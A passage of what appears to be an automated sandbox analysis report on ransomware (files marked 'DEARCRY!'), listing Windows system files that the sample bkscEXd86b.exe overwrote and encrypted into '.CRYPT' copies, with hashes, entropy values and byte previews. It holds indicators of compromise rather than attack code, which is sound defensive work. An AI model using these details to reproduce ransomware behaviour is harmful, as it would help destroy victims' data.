                                                            Preview: DEARCRY!.....YT|.+P.......?..p..]..vU..'."......h.wd.....=w.?Vw....;E|/hr..x.rx+...Q.'K...h....S..-..OBj..[..[.S...~;.......5.:....g........4......PUYa.......T.O....?...zo..U.j.c.Y.Y..S..u...(..Y..2......8...#.C.-..w.h....j/W]i Y.4wW*...!y.9..n........:..._................H.ib`[.U.b..WL_..f&..b...v.=...<l-M.._....Z8....UP.u.6`'.....6.mi/":.>.B.....y%.J........-.|LX.f.G..'.6|"..F.......lC.u.Z.../..Uv.....G.*>..pY....d.{..G.4.2.jzv..G..7.'...U....}....G.d/...U'.p.5F...v....u..m.}....T...)....Cl.%...t.k....s.w.a!._..\.D.e-e....5 .......R.9.$/|.O[.9p!|2.......>^S..O`.<7..>S.&fH-.$........~..$.c.............z...5.."...[Ic.O....[....B.o;..Qs..9....U.>..I.hP....(...1<....&.D.-ai..-..?v..z..D.E..V.....LD.Ex&1k.<.&....ln].w.)ru..o.PS.....@..+.,z.#%}.aQ[...|...}vL..#)p..V...l/........<i...Q.l......(.+.L.M.......D....7`...6.?....n)n.X.._o..[...m.E.iE..|.b.r8)|..E..t...g./Ym....&.Q7i.E.<....$.q.(x..G=.r.\s....v{Yd.5....NwG&..F..!..+..1... ..L..v.....6
                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):5505024
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:13E208EDE447EC1071589C30F6A7C00D
                                                            SHA1:453702FA57AEB7D58165806DB3A8182CEA6A7C52
                                                            SHA-256:9E156EDDDF4F0399AAEE95F979811F95D30146A2CA467705CCA92C1632A453E3
                                                            SHA-512:FF6C48AB118235342ADE4FC53B94AABF37589B195484A7AA0EDC465358C0BC8617A36B0F8F8F99F1CA9B8BCDF4DC7589D4016994ADF3EEAB631435106FFCB571
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):5507096
                                                            Entropy (8bit):7.999969755550619
                                                            Encrypted:true
                                                            SSDEEP:98304:grbNjAco3UxvacVlUAoTbGvma8wTJDEJKI5pTigml6NsJQqxXQ6w4UD9GA15:grbNsclplUxTUmdw+r3T5RfMUDL15
                                                            MD5:D215D8A3F00AF4FB16129ABD0FA6F205
                                                            SHA1:A051E998B245844F07F37EBA15527CA03791FAA3
                                                            SHA-256:A5D3BDB88EBD4BA5A9B081B52DB11766E8A2D03AC991A9473492C9B1079D3072
                                                            SHA-512:253CCE28EAF679621E083F48905414298AEA3A880D165560E2F35962E93594CC2FC8718BEE12A79FBBC0EC8739B0CDC71FC181E9AA294AE98774CB09E436450C
                                                            Malicious:true
                                                            Preview: DEARCRY!....-p..f6P..+........)...|y..i.(.Z]........o.:.......Jj.c/...-{3p.....T.....9\.d.@..).X..Vq+6V..;.<..l...B8....\..2.2[...g..(. i....O..9....9.d...MG._.O.(...h..gx...l).....d.....i.E..b.h.~..a.%.%..4d.1..........;X.A..... ~._..K.q...$M.I..\j...............\9...3.J.s..5..^I5..T...'...;..6~.(5GJ..5'.1.|..u..........`(w^.c...nn....u..t.CT).!=L.-.0.'..4..#...C....`,.%Q....~..B..p.x.B&._.%h.`.H.1.q...N<^J..Zp.....4N.........%.....{55..s.K.....L.^......ug1.b.l".........&..b.]`....2..H............`..C..D..h\!.Z......C4.k#...b..#..f....C...M%.\....N.]...7"~WOA4w9h...]e:.af...;P.]..`f._.1.J7.@.R......Ck..QF...X._....)wG#A..)......Y..?.L..0H.y......(..Fi.....-..M....f......T.....)0=y...'...Vg.1....si...`=.j..]h..@.....W.......P%.4r.._........b.o....R....r...x........$.n...=&m...~M...Z.o...'.Kw....^...k.?FX.:3.....0...m....s....2s...>.W5..vSt....*2.N...H......9..jG.+/.......&.......w.(..`)F.|..*..N([....r.F..].._.`.....I.@.43...........D0
                                                            C:\ProgramData\Microsoft\Provisioning\Microsoft-Desktop-Provisioning-Sequence.dat
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2396160
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:79FFE718FEF827A04145C27314C3E3EC
                                                            SHA1:35CEECC2A0F92AEC8C826E9371C4596E9CAA1E61
                                                            SHA-256:12CA98134C8E2E00B6A12C635A610D910C1DC2183B480B72B89C530F08FEDC04
                                                            SHA-512:26FE01B7771BEAAEF06B21DC76D51CAE7DB76F4F01AB9061EBCF19DD4E577DBB145D82BBD6C50AEFC292EB5E90B06F45645A2E2B0395B6C8148A0FFAE2921FBB
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Provisioning\Microsoft-Desktop-Provisioning-Sequence.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2397640
                                                            Entropy (8bit):7.999924950669925
                                                            Encrypted:true
                                                            SSDEEP:49152:FZ/nqPj3obTWMP/mci9GDFl8gsSUpNXFuQGz4wtaUSk:FZ/qgW6ji922npNM74wU7k
                                                            MD5:D5A421EE0CD0BBE04D5025F97D37E2AA
                                                            SHA1:EB08DA8C9E2A2A2176683B8E7A05003E9CF8B087
                                                            SHA-256:53349DD41E221B8F1AE56071DD0BCCB00B4DA6A52350CA4A0A02A39B96745CF1
                                                            SHA-512:11380B08F15123313CF40F69D3A6F2AC4621F793BB51CD609BCE65C86781A474F16CC8764345970899EFE3D35C6A9B076A81CF51DD37875FFFAAB90A2974B86A
                                                            Malicious:true
                                                            Preview: DEARCRY!........~.....I..........=@f.f_......;"...~.<<J,^}v....,c0y@V...~.Y..y..?....=...(.......u.G;.4.e.J....Q...BE+....A.&.v...2H..........qX...r.0.o.a..*...^.:.4`....yc.B.'...y&.I...+.....-.i.%1=....j..n.......s.. .x].>...P%F.l(1...^!.....H.:....a......P......h...y.Y.cM&.....=.^k..|TjD~.zh.....?~R.G2.X..'..R_0y!x@..^.W.WM..[k.hZ.o... 4..9.l...Y...%.uj:..y.\.A.....I!..p.pt.<m.i.P).<.7*.t...<|.c.............I..p0D...l/....2.......e(..+6.,.....3N.QY.@a..1.X. ...">...z....Z4g......./.W}+....F._y.B...&.2..'..1y.KAgG.W...c.LG.u......>.p./k....Q...SB.u.R31..Z.y....dPn..`p....^..../~........9h...W.':p.}.;......5.2.._...kd..@.,!.IJ.....~..'?.......{.{2.....r..d.....=I2...:.p.W.7.e.f/w.A,H7..@.\..XA{..d.Ex.w/....M..&.+...W.+...a.".4. ...n..Sb|u.ph\..........P_K.t..H1..8....j>.....g......b"...b.2..q.?...n..)..v...$....[.Z.y..x~h{.....*.h./[+...._....X...|...%.~j.>a....7...Y...eY.|V.jp..b.....:..d....XkW...@..ni$~{U=.02..gL...N....x..i......D;4+
                                                            C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):8454144
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:981C0CEA6DF2E122E3B913FAE0206B74
                                                            SHA1:6667F80DA36826B351B1258EA313538A004869B1
                                                            SHA-256:1B7224BAE3C0DF30A53479E44FF1844A0A7E3140AB3BDC82A469EB9B0D47EE92
                                                            SHA-512:2B08C04F0D97D9E3342A2C633D4AE2F7580A2A79FAEAFC4575552DE5B5F9D61299278618DFEC36AE61573F0820599CB77E8DA939E07B2058C0B87934E55F34C2
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):8454440
                                                            Entropy (8bit):7.999979505839486
                                                            Encrypted:true
                                                            SSDEEP:196608:/goZw6kalM6PzPmZy6X1MlGSxdrgbnWVB84je:/Nu6kH8Pms6qlTTsbnWC
                                                            MD5:52FCB73BF6EA23A8E100719F28CC0943
                                                            SHA1:752B5657159CCF5FCCD585C380EF21476EADC7E5
                                                            SHA-256:5AE558CF730513492F7DEF3D186AA579A3196E37AFDE19B95B42A3EB505789A2
                                                            SHA-512:9605599FFCB672114305BFFE3838F627D775EEDD57F4217A393CB7EA09E87EF44F22676683C5BFE1D9BD9DF698620D1DF828BBE6EFBE8D377EE3A4F917B51756
                                                            Malicious:true
                                                            Preview: DEARCRY!....9..._..........!_.i..\"t..T...5.7..f..g.2....K....j............7....ZMv.W_.&.^.U.|).X^..CL...\j[...9 ...} .(-]n.0.v.<...H.A...taU_..nm...J....P...P..&.%...R._.kQc'...+(.4...q.tP.X.f.a.]<._.Q.jG.KF.=@.9...<B[.....*....d..Ie..(....b..Q.Z:4.:P................UG..^....]4..q.N.Z...LZ.,..rG......J@#o.{...f.Y.q..eW......1.......P...1..F..6={.}.y.'...t.......E..a.....!.c..GW_.......w.MOARfq..{.C...+..eP..@L'..8../..+.S.u*....YF]../..@..I..b....IM:...-.s...^.A..q[.Mo[....49.....3..Q..c.F.....S..3..+v...4.g.kC>6Of#..+........CW..R..8;.....q...'.6].F..S.....=.*.H...<..nk..="....~.t.R..`.q.:.~X.".....%...T .?Co.Fa....Ak.....5...G.B!46.~#.!.eE...g......v7.Y.XJ..s.sz.....K.=...B.\.b.GD..!.}.aQ..S.y.s..[5u..&{.....M.......,p.9v..d4..DU...:...3#....&..|.|52B+.1..W.Vw.9.%U.z'...%.P......t..8xaT...lro....%*...*H..u....x=....+ix#..].$..9@......................h..jk`F...P"...."@..' .|t.p\.P.)-.....C....y..Qb.=.\...t.K..........0.b k...T.
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1179648
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:15B50E0AF9982403AA6147B2C468FB07
                                                            SHA1:55BF2215BF078ECC6DE95AC9624E7B08CB2F0411
                                                            SHA-256:0D582BE25CF9D7817CFEB459FFBA6628D62ED62BC063DB374E8014CDC2DEFD5F
                                                            SHA-512:25C754E70529AD7057375B68CAB21154335012B4937FD33D1C5A3A3F2DBDDD9CF660E64D53CC589692C17A61508FC361349AD1500F1460D2E17F0D85F678FA95
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1181424
                                                            Entropy (8bit):7.999852731615662
                                                            Encrypted:true
                                                            SSDEEP:24576:bf4dsxbKwAXuuks/4rXnDPYPNMHJkTggAWe2hfzNl9X2tjk1fl5bRb:fxW9Xuuks/4DKNuJkTKWjxlCSXh
                                                            MD5:C7C4FDBE801C4C701327F65F06377329
                                                            SHA1:74599CFD811CC664132789B07C2B5B7BCB6300E0
                                                            SHA-256:8339983DD5D3503C4AB3969F12662272A9FF43E2458E52273E25766C27D9EF15
                                                            SHA-512:EE386EB15F6C079742AAB621201C692B8A0BDF0CA80488EB5C0EF7F03A11538C81575F9DD0C20E830B2A80BE216139F4AFFB2E39FED09B37893F1AF9C91643F8
                                                            Malicious:true
                                                            Preview: DEARCRY!......g..Wc..;...p.17...m..W....~...b..ZsJ..CV..`...5of..O...y...l....n.......H..P,..4F...S...a.W...!.e....A.e.....P.)e....Q;.4.&..(n3-..M@...)\%.{X.+6.W..t.;.k.Dw`N...'..?jj.y.].>.?.1fX.h;..O.[........2C.s..w).!HT...@......B".3[.[..3...IL..qe...+...............z.....y.T.`..U..[Qs(.E/t./;...:;..>...M...C......t~T....QiU...a.....9..X..0...4....$>..jBje..".><'v..YK... .J.(B..,.N......F......pr..U..g.%e.T.6....9..s>....U..x..l...T.K;.L..R)Uy.._..d;".W..`k...:%.22.v.|9.\.jW;...p........n,.$xe...o..EO...{..FM.KDg.tw.f.j/.3.zg.t...$zqm`J.^.................^..G.]..)x ..J.....d{*.H5;h....6.)I...}.B...0..M.L....N....8hxO......Km...M?..k.;.P.O...[..g....y...l.W.ei..6...(p.xZ*^.S.&.r....C...N.....h.^A.......-...E(....^.#Y...b.P..A.....`/N.n..f.7~...4..<.]..........l>vQ..}.l....N.<5UA.........l.......+....R.'_NO6....w~./.}...-..p...;......B>....Au'..|.{D.t!..}.O/n3&1y`....e.3...i.*?.Z{.oB.F..!...P....n..=.8OU.....c6\C{..+..^%@..z.N...I.)sU(=.-
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:314E20944390BDB0D80B57257C3F1571
                                                            SHA1:1F76C4B46E1EA5618431A77DF20CD1CD33B77A7F
                                                            SHA-256:156C38442089C1323D3E3BA549A6AC24341C47E8B6367BEC4740C9B8C865826E
                                                            SHA-512:C8BD5B55AE22FA12FFA48686818BFDF83EDE790CF7F7E7C113BBA8B01FB64D9C52D068117EE9AC3FB4BD5295759D73590DB2D4E56038E989A95DB8F91F200B83
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):65832
                                                            Entropy (8bit):7.997571130658828
                                                            Encrypted:true
                                                            SSDEEP:1536:RFFTGpmuuCwJVtfhKth3XGymS2zKWTo6ffujv7L8o:S8bfU3fmS2zxTJuTF
                                                            MD5:10621B9E1C940FEB1197D2B2C1E45EAD
                                                            SHA1:7588E3B1C947BCF504131E55848877A74698F57A
                                                            SHA-256:118C1A111066177E1FD79B3155CBB0941D780E13A117525D7BDFEDEFC6F50DF1
                                                            SHA-512:19F52057EAF8AA45D2E429007D85075DBB0705B9FA31FEA85DC44B98450D535AD98F91EF90DE4A8BABC98A9BFBE8E39927BC48C080024C90A52B826C8E6CF3F7
                                                            Malicious:true
                                                            Preview: DEARCRY!......l.a4........fA.W.c.,.qnD.|..H...'...<...*.4.ZKi....ox.f....x. ..3W.V...../..5...m.+. 9[...?..p..R^....nY..wFo.1-.a......}..f?.*...n..O....i+...A..r.-Z..k.Mbq. ...am6.o..e....qN.....B0.^&.....1...BI.<.i0.Gc1e...:d.....,|b/.....;....sao+..|PL...............p.B.b.....S.c..Hrc...Y.e5.v..j.d.1c.%..yC...x}&..i....ZR....F.TJw`@..pT7..i..06Cs.....T%.\..M.u.LG..w.C."HY...U.....(..+.i.X../.7.+&..f.;K..Bc$.N<....K.f....N.OLV0m.zD.1.j(-..{S..P."."...h...yF.qe.....%W0..HO..I...``............D..U@.....g.?j[..).]....$Z.N...>(8s..Y.F.D.x/P.7.,...<.......m8YLWM.8}42b1.^....."._=..J..5M..7.mA.DG.M. p.j..O.OE.3.3.v.*....]~.....'hcAn..b)..^../.:BT.f}...i...-.bz.... S.w....8.0(....I"."!.q..I...r../...."..1...n/N.6.l.E.K..f.'..!..<6.*.HD..(..sl!.$._.P}]...L.=.-g}UqE....O...V.7...m>....A..=.CawL...$.&>..J.g.~....W.......0X.c..5f......;....M.....M..M*..x....._"U@..a....B.....Q~..........s.vX.fo..|...3...A.w.".?|l...fM.l..{..[L..W.;.O...b,g?m.
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:314E20944390BDB0D80B57257C3F1571
                                                            SHA1:1F76C4B46E1EA5618431A77DF20CD1CD33B77A7F
                                                            SHA-256:156C38442089C1323D3E3BA549A6AC24341C47E8B6367BEC4740C9B8C865826E
                                                            SHA-512:C8BD5B55AE22FA12FFA48686818BFDF83EDE790CF7F7E7C113BBA8B01FB64D9C52D068117EE9AC3FB4BD5295759D73590DB2D4E56038E989A95DB8F91F200B83
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log.CRYPT
